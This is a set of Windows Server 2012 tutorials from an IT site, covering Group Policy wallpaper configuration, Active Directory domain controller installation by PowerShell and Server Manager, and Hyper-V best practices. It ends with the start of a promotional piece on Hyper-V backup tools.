Now type the Name for this GPO object and click the OK button. We selected WallPaper GPO:

windows-2012-group-policies-6Figure 6. Creating our Wallpaper Group Policy Object
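If you prefer scripting, the same create-and-link operation can be performed with the GroupPolicy PowerShell module. A minimal sketch, assuming the OU's distinguished name matches the firewall.local structure used in this article:

# Create the GPO and link it to the FW Users OU in one pipeline
New-GPO -Name "WallPaper GPO" | New-GPLink -Target "OU=FW Users,DC=firewall,DC=local"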

Next, right-click the GPO object and click edit:

windows-2012-group-policies-7Figure 7. Editing a Group Policy Object

At this point we get to see and configure the policy that deals with the Desktop Wallpaper, however notice the number of different policies that allow us to configure and tweak various aspects of our domain users.

To find the Desktop Wallpaper setting, expand User Configuration > Policies > Administrative Templates > Desktop > Desktop. At this point we should be able to see the setting in the right window. Right-click the Desktop Wallpaper setting and select Edit:

windows-2012-group-policies-8Figure 8. Selecting and editing Desktop Wallpaper policy

The settings of Desktop Wallpaper will now open. First we need to activate the policy by selecting the Enabled option on the left. Next, type the UNC path of shared wallpaper. Remember that we must share the folder that contains the wallpaper \\FW-DC1\WallPaper\ and configure the share permission so that users can access it. Notice that we can even select to center our wallpaper (Wallpaper Style). When ready click Apply and then OK:

windows-2012-group-policies-9Figure 9. Configure Desktop Wallpaper

Now that we've configured our GPO, we need to apply it. To do so, we can simply log off and log back in on the client computer, or type the following command in the client's command prompt to apply the settings immediately:

C:\> gpupdate /force
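On Windows Server 2012 you can also trigger the refresh remotely from the domain controller using the Invoke-GPUpdate cmdlet from the GroupPolicy module (the target computer must allow the remote scheduled-task traffic this relies on). For example, against one of our lab clients:

PS C:\> Invoke-GPUpdate -Computer FW-CL1 -Force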

Once our domain user logs in to their computer (FW-CL1), the new wallpaper policy will be applied and loaded on to the computer’s desktop.

windows-2012-group-policies-10Figure 10. User Login

As we can see below, our user's desktop now has the background image configured in the group policy we created:

windows-2012-group-policies-11Figure 11. Computer Desktop Wallpaper Changed

This example shows how one small configuration setting can be applied to all computers inside an organization. The power and flexibility of Group Policy Objects is truly unbelievable and as we’ve shown, it’s even easier to configure and apply them with just a few clicks on the domain controller!


This article explained what Group Policies Objects are and showed how to Configure Windows 2012 Active Directory Group Policies to control our Active Directory users and computers. We also highly recommend our article on Group Policy Enforcement, Inheritance throughout the Active Directory structure. More articles on Windows 2012 & Hyper-V can be found at our Windows 2012 Server section.

 


Installing Active Directory Services & Domain Controller via Windows PowerShell. Active Directory Concepts

This article serves as an Active Directory tutorial covering installation and setup of Windows 2012 Active Directory Services Role & Domain Controller using Windows 2012 PowerShell.

Our previous article covered the installation of Windows Server 2012 Active Directory Services role and Domain Controller installation using the Windows Server Manager (GUI) interface.


What Is Active Directory?

Active Directory is at the heart of Windows Server operating systems. Active Directory Domain Services (AD DS) is the central repository of Active Directory objects such as user accounts, computer accounts, groups, group policies and so on. Active Directory also authenticates user accounts and computer accounts when they log in to the domain. Computers must be joined to the domain in order to authenticate Active Directory users.

Active Directory is a database that is made up of several components which are important for us to understand before attempting to install and configure Active Directory Services on Windows Server 2012. These components are:

  1. Domain Controller (DC): - Domain Controllers are servers where the Active Directory Domain Services role is installed. The DC stores copies of the Active Directory Database (NTDS.DIT) and SYSVOL (System Volume) folder.
  2. Data Store: - It is the actual file (NTDS.DIT) that stores the Active Directory information.
  3. Domain: - An Active Directory Domain is a group of computers and user accounts that share common administration within a central Active Directory database.
  4. Forest: - A Forest is a collection of Domains that share a common Active Directory database. The first Domain in a Forest is called the Forest Root Domain.
  5. Tree: - A Tree is a collection of domain names that share a common root domain.
  6. Schema: - The Schema defines the list of attributes and object types that all objects in the Active Directory database can have.
  7. Organizational Units (OUs): - OUs are simply containers or folders in Active Directory that store other Active Directory objects such as user accounts, computer accounts and so on. OUs are also used to delegate control and apply group policies.
  8. Sites: - Sites are Active Directory objects that represent physical locations. Sites are configured for proper replication of the Active Directory database between sites.
  9. Partition: - Active Directory database file is made up of multiple partitions which are also called naming contexts. The Active Directory database consists of partitions such as application, schema, configuration, domain and global catalog.

Checking Active Directory Domain Services Role Availability 

Another method of installing an Active Directory Services Role &  Domain Controller is with the use of Windows PowerShell. PowerShell is a powerful scripting tool and an alternative to the Windows GUI wizard we covered in our previous article. Open PowerShell as an Administrator and type the following cmdlet to check for the Active Directory Domain Services Role availability:

PS C:\Users\Administrator> Get-WindowsFeature AD-Domain-Services

The system should return the Install State as Available, indicating the role is available for immediate installation. We can now safely proceed to the next step.

Install Active Directory Services Role & Domain Controller Using Windows PowerShell

To initiate the installation of Active Directory Services Role on Windows Server 2012 R2, issue the following cmdlet:

PS C:\Users\Administrator> Install-WindowsFeature –Name AD-Domain-Services

The system will immediately begin the installation of the Active Directory Domain Services role and provide an update of the installation's progress:

windows-2012-active-directory-powershell-1

Figure 1. Installing Active Directory Domain Services with PowerShell

Once the installation is complete, the prompt is updated with a success message (Exit Code) as shown below:

windows-2012-active-directory-powershell-2

Figure 2. Finished Installing ADDS with PowerShell

The next step is to promote the server to an Active Directory domain controller. Before doing so, you should run the prerequisites test for a new forest installation by typing the following cmdlet in PowerShell:

PS C:\Users\Administrator> Test-ADDSForestInstallation

The following figure shows the command execution and system output:

windows-2012-active-directory-powershell-3

Figure 3. Prerequisite Installation

Now it's time to promote the server to a domain controller. For this step, we need to save all parameters in a PowerShell script (using notepad), which will then be used during the domain controller installation.


Below are the options we used - these are identical to what we selected in our GUI Wizard installation covered in our Windows Server 2012 Active Directory Services role and Domain Controller installation using the Windows Server Manager (GUI) article:

#
# Windows PowerShell script for AD DS Deployment
#
Import-Module ADDSDeployment
Install-ADDSForest `
-CreateDnsDelegation:$false `
-DatabasePath "C:\Windows\NTDS" `
-DomainMode "Win2012R2" `
-DomainName "firewall.local" `
-DomainNetbiosName "FIREWALL" `
-ForestMode "Win2012R2" `
-InstallDns:$true `
-LogPath "C:\Windows\NTDS" `
-NoRebootOnCompletion:$false `
-SysvolPath "C:\Windows\SYSVOL" `
-Force:$true

Save the script to an easily accessible location, e.g. the Desktop, with the name InstallDC.ps1.

Before running the script, we need to change the execution policy of PowerShell to remote signed. This is accomplished with the following cmdlet:
PS C:\Users\Administrator\Desktop> Set-ExecutionPolicy RemoteSigned

The following figure shows the command execution and system output:

windows-2012-active-directory-powershell-4

Figure 4. Changing the Execution Policy of PowerShell

Now we can execute our script from within PowerShell by changing the PowerShell directory to the location where the script resides and typing the following cmdlet:

PS C:\Users\Administrator\Desktop> .\InstallDC.ps1

Once executed, the server is promoted to Domain Controller and installation updates are provided at the PowerShell prompt:

windows-2012-active-directory-powershell-4

Figure 5. Promoting Server to Domain Controller

After the installation is complete, the server will reboot. Once it is back up, it will have Active Directory Domain Services installed and will be operating as a Domain Controller.
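As a quick sanity check after the reboot, the new domain and domain controller can be queried from PowerShell using the ActiveDirectory module that is installed together with AD DS. The host name below is an example from our lab setup; replace it with your own:

PS C:\Users\Administrator> Get-ADDomain firewall.local
PS C:\Users\Administrator> Get-ADDomainController -Identity FW-DC01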

This completes the installation and setup of Windows 2012 Active Directory Services Role & Domain Controller using Windows 2012 PowerShell.



Installing Windows Server 2012 Active Directory via Server Manager. Active Directory Concepts

This article serves as an Active Directory tutorial covering installation and setup of a Windows 2012 Domain Controller using Windows Server Manager (GUI).

Readers interested in performing the installation via Windows PowerShell can read this article.


What is Active Directory?

Active Directory is at the heart of Windows Server operating systems. Active Directory Domain Services (AD DS) is a central repository of Active Directory objects such as user accounts, computer accounts, groups, group policies and so on. Active Directory also authenticates user accounts and computer accounts when they log in to the domain. Computers must be joined to the domain in order to authenticate Active Directory users.

Active Directory is a database that is made up of several components which are important for us to understand before attempting to install and configure Active Directory Services on Windows Server 2012. These components are:

  1. Domain Controller (DC): - Domain Controllers are servers where the Active Directory Domain Services role is installed. The DC stores copies of the Active Directory Database (NTDS.DIT) and SYSVOL (System Volume) folder.
  2. Data Store: - It is the actual file (NTDS.DIT) that stores the Active Directory information.
  3. Domain: - An Active Directory Domain is a group of computers and user accounts that share common administration within a central Active Directory database.
  4. Forest: - A Forest is a collection of Domains that share a common Active Directory database. The first Domain in a Forest is called the Forest Root Domain.
  5. Tree: - A Tree is a collection of domain names that share a common root domain.
  6. Schema: - The Schema defines the list of attributes and object types that all objects in the Active Directory database can have.
  7. Organizational Units (OUs): - OUs are simply containers or folders in Active Directory that store other Active Directory objects such as user accounts, computer accounts and so on. OUs are also used to delegate control and apply group policies.
  8. Sites: - Sites are Active Directory objects that represent physical locations. Sites are configured for proper replication of the Active Directory database between sites.
  9. Partition: - Active Directory database file is made up of multiple partitions which are also called naming contexts. The Active Directory database consists of partitions such as application, schema, configuration, domain and global catalog.

Installing Active Directory Domain Controller In Server 2012

In Windows Server 2012, the Active Directory Domain Controller role can be installed using the Server Manager or alternatively, using Windows PowerShell. The figure below represents our lab setup which includes a Windows Server 2012 (FW-DC01) waiting to have the Active Directory Domain Services server role installed on it:

windows-2012-active-directory-installation-1

Notice that there are two Windows 8 clients waiting to join the Active Directory domain once installed.

A checklist before installing a Domain Controller in your network is always recommended. The list should include the following information:

  • Server Host Name – A valid hostname or computer name must be assigned to the domain controller. We've selected FW-DC01 as the server's host name.
  • IP Address – You should configure a static IP address which will not be changed later on. In our example, we've used 192.168.1.1/24, a Class C IP address.
  • Domain Name – Perhaps one of the most important items on our checklist. We've used firewall.local for our setup. While many will want to use an existing public domain, e.g. their company's domain, it is highly recommended that this practice is avoided, as it can create a number of problems with DNS resolution when internal hosts or servers try to resolve hosts that exist in both the private and public name spaces.

Microsoft doesn't recommend the usage of a public domain name in an internal domain controller, which is why we selected firewall.local instead of firewall.cx.
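The checklist items themselves can be completed from PowerShell before the role is installed. A hedged sketch using the lab values above and assuming the network adapter is named Ethernet:

# Assign the static IP address and point the DNS client at the server's own address
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.1.1 -PrefixLength 24
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 192.168.1.1

# Set the host name (the server restarts for the change to apply)
Rename-Computer -NewName "FW-DC01" -Restart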

Installing Active Directory Domain Controller Using Server Manager

Initiating the installation of Active Directory is a simple process; however it does require Administrator privileges. Open Server Manager, go to Manage and select Add Roles and Features:

Figure 2. Add Roles and Features

Click Next on the Before you begin page.

On the next screen, choose Role-based or feature-based Installation and click Next:

windows-2012-active-directory-installation-3

 Figure 3. Choose Role Based Installation

Select the destination server by choosing the Select a server from the server pool option, then select the server and click Next. In cases like our lab, where there is only one server available, that server must be selected:

windows-2012-active-directory-installation-4

 Figure 4. Select Destination Server

In the Select server roles page, select the Active Directory Domain Services role and click Next:

windows-2012-active-directory-installation-5

Figure 5. Select AD DS role

The next page is the Features page, which we can safely skip by clicking Next.

The Active Directory Domain Services page contains limited information on requirements and best practices for Active Directory Domain Services:

windows-2012-active-directory-installation-6

Figure 6. AD DS Page

Once you've read the information provided, click Next to proceed to the final confirmation page.


On the confirmation page, select Restart the destination server automatically if required and click on the Install button. By clicking Install, you confirm you are ready to begin the AD DS role installation:

windows-2012-active-directory-installation-7

Figure 7. AD DS Confirmation

Note: You cannot cancel a role installation once it begins

The Add Roles and Feature Wizard will continuously provide updates during the Active Directory Domain Services role installation, as shown below:

windows-2012-active-directory-installation-8

Figure 8. Installation Progress

Once the installation has completed successfully, we should expect to see the Installation succeeded message under the installation progress bar:

windows-2012-active-directory-installation-9

Figure 9. Successful Installation & Promote Server to DC

Promoting Server To Domain Controller

At this point we can choose to Promote this server to a domain controller by clicking on the appropriate link as highlighted above (Blue arrow).

After selecting the Promote this server to a domain controller option, the Deployment Configuration page will appear. Assuming this is the first domain controller in the network, as in our case, select the Add a new forest option to set up a new forest, and then type the fully qualified domain name in the Root domain name field. We've selected to use firewall.local:

windows-2012-active-directory-installation-10

Figure 10. Configure Domain Name

Administrators who already have active directory installed would most likely select the Add a domain controller to an existing domain option. Having at least two Domain Controllers is highly advisable for redundancy purposes. When done click the Next button.

Now select Windows Server 2012 R2 for the Forest functional level and Domain functional level. By setting the domain and forest functional levels to the highest value that your environment can support, you'll be able to use as many Active Directory Domain Services features as possible. If, for example, you do not plan to ever add domain controllers running Windows 2003, but might add a Windows 2008 server as a domain controller, you would select Windows Server 2008 for the Domain functional level. Next, tick the Domain Name System (DNS) server option as shown in the figure below:

windows-2012-active-directory-installation-11

Figure 11. DC Capabilities

The DNS Server role can also be installed later on. If for any reason you need to install the DNS Server role at a later stage, please read our How to Install and Configure Windows 2012 DNS Server Role article.

Since this is the first domain controller in the forest, Global Catalog (GC) will be selected by default. Now set the Directory Services Restore Mode (DSRM) password. DSRM is used to restore active directory in case of failure. Once done, click Next.

The next window is the DNS Options page. Here we might encounter the following error which can be safely ignored simply because of the absence of a DNS server (which we are about to install):

A delegation for this DNS server cannot be created because the authoritative parent zone cannot be found...

Ignore the error and click Next to continue.

In the next window, Additional Options, leave the default NetBIOS domain name and click Next. The Windows AD DS wizard will automatically remove the .local from the domain name to ensure compatibility with NetBIOS name resolution:

windows-2012-active-directory-installation-12

Figure 12. Additional Options

The next step involves the Paths selection which allows the selection of where to install the Database, Log Files and SYSVOL folders. You can either browse to a different location or leave the default settings (as we did). When complete, click Next:

windows-2012-active-directory-installation-13

Figure 13. Paths

Note: When the installation is complete, the Database folder will contain a file named NTDS.DIT. This important file is the database file of your Active Directory.

Finally, the next screen allows us to perform a quick review of all selected options before initiating the installation. Once reviewed, click Next:

windows-2012-active-directory-installation-14

Figure 14. Review Options

The server will now perform a prerequisites check. If successful, a green check mark is shown at the top. Some warnings may appear; however, if these are non-critical, we can still proceed with the installation. Click the Install button to promote this server to a domain controller:

windows-2012-active-directory-installation-15

Figure 15. Prerequisites Check

The installation begins and the server's installation progress is continuously updated:

windows-2012-active-directory-installation-16

Figure 16. Installation Begins

When the installation of Active Directory is complete, the server will restart.

Once the server has restarted, we can open Active Directory Users and Computers and begin creating user accounts and computer accounts, applying group policies, and so on.

windows-2012-active-directory-installation-17

Figure 17. Active Directory Users and Computers

As expected, under the Domain Controllers section, we found our single domain controller. If we were to add our new domain controller to an existing active directory, then we would expect to find all domain controllers listed here.



Hyper-V Best Practices - Replica, Cluster, Backup Advice

hyper-v-best-practices-1aHyper-V has proven to be a very cost-effective solution for server consolidation; evidence of this is the fact that companies are beginning to move from VMware to the Hyper-V virtualization platform. This article covers Windows 2012 Hyper-V best practices and aims to help you run your Hyper-V virtualization environment as optimally as possible.

Keeping your Hyper-V virtualization infrastructure running as smoothly as possible can be a daunting task, which is why we recommend engineers follow the best Hyper-V practices.

Different organizations have different setups and requirements: some of you might be moving from VMware to Hyper-V virtualization, while others might be upgrading from an older Hyper-V virtualization server to a newer one. Whatever the scenario, following the baseline best practices will help you run the virtualization infrastructure successfully and without problems.


Hyper-V Best Practice List

Best practices for Hyper-V vary considerably depending on whether you're using clustered servers. As a general rule-of-thumb the best thing you can do is try to configure your host server and your Virtual Machines in a way that avoids resource contention to the greatest extent possible.

Organizations who are considering migrating their infrastructure to Hyper-V, or are currently running on the Hyper-V virtualization platform, need to take note of the below important points that must not be overlooked:

Processor

Minimum: A 1.4 GHz 64-bit processor with hardware-assisted virtualization. This feature is available in processors that include a virtualization option—specifically, processors with Intel Virtualization Technology (Intel VT) or AMD Virtualization (AMD-V) technology.
Hardware-enforced Data Execution Prevention (DEP) must also be available and enabled. For Intel CPUs, this translates to enabling the Intel XD ("execute disable") bit, while for AMD CPUs it means enabling the AMD NX ("no execute") bit.

Memory

Minimum: 512 MB. This is the bare minimum; however, a more realistic approach would be at least 4 GB of RAM per virtual server. If one physical server is to host 4 virtual machines, then we would recommend at least 16 GB of physical RAM, if not more. SQL servers and other RAM-intensive services would certainly lift the memory requirements a lot higher. You can never have enough memory.

Network Adapters

At least one network adapter is required, but two or more are always recommended. Hyper-V allows the creation of three different virtual switches: Internal Virtual Switches, Private Virtual Switches and External Virtual Switches.

Internal virtual switches are used to allow the virtual machines to connect with their host machine (the physical machine that runs Hyper-V). Private virtual switches are used when we only want to connect virtual machines, running on the same host, to each other. External virtual switches are used to allow the virtual machines to connect to our LAN network, and this is where physical network adapters come in handy.
Host machines with only one network adapter will be forced to share that network adapter with all their virtual machines. This is why it's always best practice to have at least two network adapters available.
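For reference, each of the three switch types can be created with the Hyper-V PowerShell module. The names below are examples, and the external switch assumes a physical adapter called Ethernet 2:

# External switch bound to a physical NIC (shared with the management OS in this example)
New-VMSwitch -Name "External-LAN" -NetAdapterName "Ethernet 2" -AllowManagementOS $true

# Internal switch: VMs can talk to each other and to the Hyper-V host
New-VMSwitch -Name "Internal-Only" -SwitchType Internal

# Private switch: VMs on this host can talk only to each other
New-VMSwitch -Name "Private-Only" -SwitchType Private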

Additional Considerations

The settings for hardware-assisted virtualization and hardware-enforced DEP are usually available from within the system's BIOS; however, the names of the settings may differ from the names identified previously.
For more information about whether a specific processor model supports Hyper-V (virtualization), it is recommended to check the manufacturer's website.

As noted before, it is important to remember that after modifying the settings for hardware-assisted virtualization or hardware-enforced DEP, you may need to power the server off and back on to ensure the new CPU settings are loaded.

Microsoft Assessment & Planning Toolkit

The Microsoft Assessment and Planning Toolkit (MAP) can be used to study your existing infrastructure and determine the Hyper-V requirements. For organizations interested in server consolidation and virtualization through technologies such as Hyper-V, MAP helps gather performance metrics and generate server consolidation recommendations that identify the candidates for server virtualization, and will even suggest how the physical servers might be placed in a virtualized environment.

The diagram below shows the MAP phases involved to successfully create the necessary reports:

hyper-v-best-practices-1

Figure 1. MAP Phases

Below is an overview of the Microsoft Assessment and Planning Toolkit application:

hyper-v-best-practices-2

Figure 2. MAP Overview

The following points are the best practices which should be considered before deploying your Windows Server 2012 Hyper-V infrastructure:

Hyper-V Hosts (Physical Servers)

  • Ensure hosts are up-to-date with recommended Microsoft updates
  • Ensure hosts have the latest BIOS version, as well as the latest firmware for other hardware devices (such as Synthetic Fiber Channel, NICs, RAID BIOS, etc.)
  • Hosts must be part of a domain before you can create a Hyper-V High-Availability Cluster.
  • RDP Printer Mapping should be disabled on hosts, to remove any chance of a printer driver causing instability issues on the host machine. To do this, follow the below steps: Computer Configuration –> Policies –> Administrative Templates –> Windows Components –> Remote Desktop Services –> Remote Desktop Session Host –> Printer Redirection –> Do not allow client printer redirection –> Set to "Enabled”
  • Do not install any other Roles on a host besides the Hyper-V role and the Remote Desktop Services roles. Optionally, if the host will become part of a cluster, you can install Failover Cluster Manager. In the event the host connects to an iSCSI SAN and/or Fiber Channel, you can also install Multipath I/O.
  • Anti-virus software should exclude Hyper-V specific files using the Hyper-V: Antivirus Exclusions for Hyper-V Hosts article available from Microsoft.
  • The default path for Virtual Hard Disks (VHD/VHDX) should be set to a non-system drive, as storing them on the system drive can cause disk latency and creates the potential for the host to run out of disk space.
  • If you are using iSCSI: In Windows Firewall with Advanced Security, enable iSCSI Service (TCP-In) for Inbound and iSCSI Service (TCP-Out) for outbound in Firewall settings on each host. This will ensure iSCSI traffic is allowed to pass from host to the SAN device and back. Not enabling these rules will prevent iSCSI communication. To set the iSCSI firewall rules via netsh, you can use the following command:

PS C:\Windows\system32> Netsh advfirewall firewall set rule group="iSCSI Service" new enable=yes

  • Periodically run performance counters against the host to ensure optimal performance. We recommend using the Hyper-V performance counters that can be extracted from the free Codeplex PAL application.

Hyper-V Virtual Machines

  • Ensure you are running only supported guests in your environment.
  • Ensure you are using sophisticated backup software such as Altaro's Hyper-V Backup, which also includes free lifetime backup for a specific number of VMs.
  • If you are converting VMware virtual machines to Hyper-V, consider using MVMC (a free, stand-alone tool offered by Microsoft) or VMM.
  • Disk2vhd is a tool which can be used to convert a physical machine to a Hyper-V virtual machine (P2V). The VHD file created can then be imported into Hyper-V.

Hyper-V Physical NICs

  • Ensure Network Adapters have the latest firmware and drivers, which often address known issues with hardware and performance.
  • TCP Chimney Offload is not supported with Server 2012 software-based NIC teaming, because TCP Chimney has the entire networking stack offloaded to the NIC. If however software-based NIC teaming is not used, you can leave TCP Chimney Offload enabled. To disable TCP Chimney Offload, from an elevated command-prompt, type the following command:

PS C:\Windows\system32> netsh int tcp set global chimney=disabled

  • Jumbo frames should be turned on and set for 9000 or 9014 (depending on your hardware) for CSV, iSCSI and Live Migration networks. To verify Jumbo frames have been successfully configured, run the following command from all your Hyper-V host(s) to your iSCSI SAN:

PS C:\Windows\system32> ping 10.50.2.35 -f -l 8000

This command will ping the SAN (e.g. 10.50.2.35) with an 8K packet from the host. If replies are received, Jumbo frames are properly configured. Note that in the case a network switch exists between the host and iSCSI SAN, Jumbo frames must be enabled on that as well.

hyper-v-best-practices-3

 Figure 3. Jumbo Frame Ping Test

  • Management NIC should be at the top (1st) in NIC Binding Order. To set the NIC binding order: Control Panel --> Network and Internet --> Network Connections. Next, select the advanced menu item, and select Advanced Settings. In the Advanced Settings window, select your management network under Connections and use the arrows on the right to move it to the top of the list.
  • If using NIC teaming inside a guest VM, follow this order: open the settings of the virtual machine; under Network Adapter, select Advanced Features; in the right pane, under Network Teaming, tick the "Enable this network adapter to be part of a team in the guest operating system" option. Then, inside the VM, open Server Manager and, in the All Servers view, enable NIC Teaming for the server:

hyper-v-best-practices-4

Figure 4. Enable NIC Teaming

Hyper-V Disks

  • New disks should use the VHDX format. Disks created in earlier Hyper-V iterations should be converted to VHDX, unless there is a need to move the VHD back to a 2008 Hyper-V host.
  • Disk used for CSV must be partitioned with NTFS. You cannot use a disk for a CSV that is formatted with FAT, FAT32, or Resilient File System (ReFS).
  • Disks should be of fixed size in a production environment, to increase disk throughput. Differencing and dynamic disks are not recommended for production due to their increased disk read/write latency.
  • Shared Virtual Hard Disk: Do not use a shared VHDx file for the operating system disk. Servers should have a unique VHDx (for the OS) that only they can access. Shared Virtual Hard Disks are better used as data disks and for the disk witness.
  • Use caution when using snapshots. If not properly managed, snapshots can cause disk space issues, as well as additional physical I/O overhead.
  • The page file on a Hyper-V host should be managed by the OS and not configured manually.
  • It is not supported to create a storage pool using Fiber Channel or iSCSI LUNs.

Hyper-V Memory

  • Use Dynamic Memory on all VMs (unless not supported); see the PowerShell sketch after this list.
  • The guest OS should be configured with at least the recommended minimum memory.
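A minimal sketch of enabling Dynamic Memory with the Hyper-V PowerShell module is shown below; the VM name and memory values are examples only and should be sized to the workload (the VM should be powered off when changing memory settings):

# Enable Dynamic Memory on an example VM
Set-VMMemory -VMName "FW-SQL01" -DynamicMemoryEnabled $true -StartupBytes 1GB -MinimumBytes 512MB -MaximumBytes 4GB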

Hyper-V Clusters

  • Set the preferred network for CSV communication, to ensure the correct network is used for this traffic. The network with the lowest metric in the output generated by the PowerShell commands below will be used for CSV traffic. First, open a PowerShell command prompt (using "Run as administrator"). Secondly, you'll need to import the FailoverClusters module. Type the following at the PowerShell command prompt:

PS C:\Windows\system32> Import-Module FailoverClusters

Next, we’ll request a listing of the cluster networks, along with the metric assigned to each. This can be done by typing the following:

PS C:\Windows\system32> Get-ClusterNetwork | ft Name, Metric, AutoMetric, Role

In order to change which network interface is used for CSV traffic, use the following PowerShell command:

PS C:\Windows\system32> (Get-ClusterNetwork "CSV Network").Metric=900

This will set the metric of the network named "CSV Network" to 900.

hyper-v-best-practices-5

Figure 5. Get Cluster Network

  • Set the preferred network(s) for Live Migration, to ensure the correct network(s) are used for this traffic, by following these steps: open Failover Cluster Manager and expand the cluster; right-click Networks and select Live Migration Settings; use the Up/Down buttons to order the networks from most preferred (top) to least preferred (bottom); untick any networks you do not want used for Live Migration traffic; click Apply and then OK. Once you have made this change, it applies to all VMs in the cluster.
  • The Host Shutdown Time (ShutdownTimeoutInMinutes registry entry) can be increased from the default time. This setting is usually increased when additional time is needed by VMs in order to ensure they have had enough time to shut down before the host reboots.

Registry Key: HKLM\Cluster\ShutdownTimeoutInMinutes 

Enter the number of minutes as a decimal value.

Note: Changing this registry value requires a server reboot in order to take effect (a PowerShell alternative to editing the registry manually is shown after Figure 6):

hyper-v-best-practices-6

Figure 6. Registry Shutdown Option
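
If you prefer not to edit the registry by hand, the same value can be set from an elevated PowerShell prompt on the cluster node. This is only a sketch; the value of 30 minutes is an example:

PS C:\Windows\system32> Set-ItemProperty -Path "HKLM:\Cluster" -Name "ShutdownTimeoutInMinutes" -Value 30 -Type DWord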

  • Run Cluster Validation periodically and remediate any issues it reports.
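
Validation can also be run from PowerShell with the FailoverClusters module. A minimal example, assuming two hosts named HV-HOST01 and HV-HOST02:

PS C:\Windows\system32> Test-Cluster -Node HV-HOST01, HV-HOST02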

Hyper-V Replica

  • Run the Hyper-V Replica Capacity Planner. The Capacity Planner for Hyper-V Replica allows you to plan your Hyper-V Replica deployment based on the workload, storage, network and server characteristics.
  • Update inbound firewall rules to allow TCP port 80 and/or port 443 traffic. In Windows Firewall, enable the “Hyper-V Replica HTTP Listener (TCP-In)” and/or “Hyper-V Replica HTTPS Listener (TCP-In)” rule on each node of the cluster. The shell commands to achieve this are:

PS C:\Windows\system32> netsh advfirewall firewall set rule group="Hyper-V Replica HTTP" new enable=yes
PS C:\Windows\system32> netsh advfirewall firewall set rule group="Hyper-V Replica HTTPS" new enable=yes

  • Virtual hard disks that hold paging files should be excluded from replication, unless the page file is on the OS disk (see the sketch after this list).
  • Test failovers should be performed monthly, at a minimum, to verify that failover will succeed and that virtual machine workloads will operate as expected after failover.
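
When enabling replication from PowerShell, a dedicated page-file disk can be excluded at the same time. The sketch below uses placeholder VM, replica server and VHDX names, and assumes Kerberos authentication over port 80:

PS C:\Windows\system32> Enable-VMReplication -VMName "SRV-APP01" -ReplicaServerName "HV-REPLICA01" -ReplicaServerPort 80 -AuthenticationType Kerberos -ExcludedVhdPath "D:\VMs\SRV-APP01-pagefile.vhdx"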

Hyper-V Cluster-Aware Updating

  • Place all Cluster-Aware Updating (CAU) Run Profiles on a single file share accessible to all potential CAU Update Coordinators. Run Profiles are configuration settings that can be saved as an XML file, called an Updating Run Profile, and reused for later Updating Runs.
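
For reference, an Updating Run can also be started on demand from PowerShell. This is only a sketch; the cluster name is a placeholder, and any saved Run Profile settings would normally be supplied through the CAU console or additional parameters:

PS C:\Windows\system32> Invoke-CauRun -ClusterName "HV-CLUSTER01" -CauPluginName Microsoft.WindowsUpdatePlugin -Force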

Hyper-V SMB 3.0 File Shares

  • An Active Directory infrastructure is required, so that you can grant permissions to the computer accounts of the Hyper-V hosts (see the sketch after this list).
  • Loopback configurations (where the computer that is running Hyper-V is used as the file server for its own virtual machine storage) are not supported. Similarly, running the file share inside a VM that is hosted on the same Hyper-V nodes that will consume the share is not supported.
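
The sketch below shows one way to create such a share and grant full access to the Hyper-V host computer accounts; the share name, path, domain and host names are all examples, and the second command simply copies the share permissions onto the NTFS folder ACL:

PS C:\Windows\system32> New-SmbShare -Name "VMStore" -Path "E:\Shares\VMStore" -FullAccess "CONTOSO\HV-HOST01$", "CONTOSO\HV-HOST02$", "CONTOSO\Hyper-V Admins"
PS C:\Windows\system32> Set-SmbPathAcl -ShareName "VMStore"    # apply matching NTFS permissions to the folder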

Hyper-V Integration Services

  • Ensure Integration Services (IS) have been installed on all VMs. Integration Services significantly improve interaction between the VM and the physical host.
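
A quick way to spot VMs with missing or outdated Integration Services is to list the version and state reported by each VM from the host:

PS C:\Windows\system32> Get-VM | Format-Table Name, State, IntegrationServicesVersion, IntegrationServicesState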

Hyper-V Offloaded Data Transfer (ODX) Usage

  • If your SAN supports ODX, you should strongly consider enabling ODX on your Hyper-V hosts, as well as on any VMs that connect directly to SAN storage LUNs.
To enable ODX, open PowerShell (using ‘Run as Administrator’) and type the following:

C:\> Set-ItemProperty hklm:\system\currentcontrolset\control\filesystem -Name "FilterSupportedFeaturesMode" -Value 0

Be sure to run this command on every Hyper-V host that connects to the SAN, as well as any VM that connects directly to the SAN.
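
To verify the current setting, read the value back; a value of 0 means ODX is enabled, while 1 means it is disabled:

C:\> Get-ItemProperty hklm:\system\currentcontrolset\control\filesystem -Name "FilterSupportedFeaturesMode"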

This concludes our Windows 2012 Hyper-V Best Practices article. We hope you’ve found the information provided useful and that it helps make your everyday administration a much easier task.




The Importance of a Hyper-V & VMware Server Backup Tool - 20 Reasons Why You Should Use One

hyper-v-backup-tool

Using Hyper-V Server virtualization technology, you can virtualize your physical environment and reduce the cost of physical hardware. As part of IT best practices, you implement monitoring solutions to monitor the Hyper-V servers and the virtual machines running on them, and you secure the production environment by installing antivirus software. It is equally necessary to implement a backup mechanism, using a dedicated Hyper-V Server backup tool, so that business services can be restored as quickly as possible.

This article explains why it is important to choose a dedicated Hyper-V backup tool rather than relying on the existing native mechanisms, as outlined in the points below.

Users interested can also read our articles on Hyper-V Concepts/VDI, how to install Hyper-V Server & creating a Virtual Machine in Hyper-V.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle:   It's FREE for Firewall.cx readers!  Download Now!

1. Flexibility

Third-party backup products are designed in such a way that the product is easy to use when it comes to backup or restore a virtual machine running on the Hyper-V Server. For example, using third-party backup product, you can select a virtual machine to backup or restore. In case of any disaster with a virtual machine, it becomes easy for an IT administrator to use the flexible backup product’s console to restore a virtual machine from backup copies and restore the business services as quickly as possible.

2. Verification Of Restores

Third-party backup products provide features to verify restores without impacting the production workload. IT administrators can use the verification feature to restore the backup copies to a standalone environment to make sure these backup copies can be restored successfully in the future, if required.

3. Designed For Use With Hyper-V

A third-party backup product is designed for use with a specific technology. For example, SQL Server backup products are designed to back up and restore SQL Server databases. Similarly, third-party Hyper-V backup products are designed specifically for use with Hyper-V servers. Since these dedicated Hyper-V backup products integrate closely with Hyper-V, they are more trusted by IT organizations.

4. Full Backup Copy Of Virtual Machine

